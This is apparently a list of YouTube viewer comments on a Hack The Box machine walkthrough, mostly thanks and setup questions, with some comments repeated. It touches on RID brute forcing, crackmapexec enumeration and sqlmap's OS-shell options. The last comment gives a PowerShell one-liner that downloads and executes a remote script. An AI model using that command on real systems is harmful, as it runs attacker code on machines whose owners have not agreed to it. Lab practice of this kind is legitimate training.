I rooted this box in the first 25 roots, so the RID brute forcing was actually bypassable with a user that could be enumerated with crackmapexec. It was patched later on, but it was cool to see the stuff I missed out on during the process :) Thanks for the video as always!
Using proxy when sending data and looking visualization in burp. Thats why i need . So i can solve sending data problem quicly. thank you very much bro.
I rooted this box in the first 25 roots, so the RID brute forcing was actually bypassable with a user that could be enumerated with crackmapexec. It was patched later on, but it was cool to see the stuff I missed out on during the process :) Thanks for the video as always!
Always enjoying watching and learning, thanks :)
Sweet can't wait to see how you did the box
Hey Ippsec a quick out of the context question does Jeopardy CTF's help in developing skills to solve boot2root CTF's
Was wondering if any boxes would be affected by that exploit. Looks like at least one is.
What SO you are using ? And If It Kali, you are using on a virtual box ?
He's using Parrot with VMware Workstation afaik
I prefer r.json() instead of json.loads(r.text), where r is return value from requests.post(...)
why are you never using sqlmaps --os-shell or --os-pwn arguments?
I just don’t like them they will rarely work and I rather have more control when touching disk
Brilliant video keep it up....
Using proxy when sending data and looking visualization in burp. Thats why i need . So i can solve sending data problem quicly. thank you very much bro.
Thank you for the walk through. At 11 minutes if you provided an empty string you would have had 17 users returned, you missed egre55 😉.
One of the best boxes
Thanks :D
Thanks.
nice
1:52:03 lmao
netstat -oa | findstr 127.0.0.1 . -o shows process id
You don’t need to use any quotations for downloading and executing scripts, you can just do iex(iwr(server/script.ps1)) to avoid using base64